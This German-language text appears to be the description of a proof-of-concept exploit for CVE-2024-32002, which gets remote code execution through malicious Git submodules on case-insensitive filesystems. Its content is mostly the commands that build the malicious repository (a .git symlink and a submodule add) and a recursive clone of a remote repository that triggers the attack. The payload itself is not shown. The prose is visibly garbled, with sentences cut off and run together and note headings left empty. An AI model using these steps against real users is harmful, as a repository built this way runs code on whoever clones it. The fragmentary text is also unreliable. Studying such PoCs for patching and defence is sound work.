
Proof-of-Concept-Exploit für CVE-2024-32002, der Remote-Codeausführung über bösartige Git-Submodule auf Dateisystemen ohne Groß-/Kleinschreibung demonstriert.
Ein POC für CVE-2024-32002, der Remote Code Execution (RCE) demonstriert.
Siehe cve-2024-32002-poc-rce für das zugehörige Submodul-Repository.
.git-Verzeichnis verweist..gitmodules-Datei, die das schädliche Submodul definiert.Dieses Repository wurde unter Linux (genauer gesagt WSL2) erstellt. Das ist wichtig: Das schädliche Repository kann nur auf einem Dateisystem erstellt werden, das Groß- und Kleinschreibung unterscheidet.
ln -s .git submodule
Hinweise:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
Hinweise:
.git-Verzeichnisses, der den Git-Status für Submodule verfolgt.Diese Schwachstelle betrifft nur Windows und macOS, da beide über Dateisysteme verfügen, die nicht zwischen Groß- und Kleinschreibung unterscheiden.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git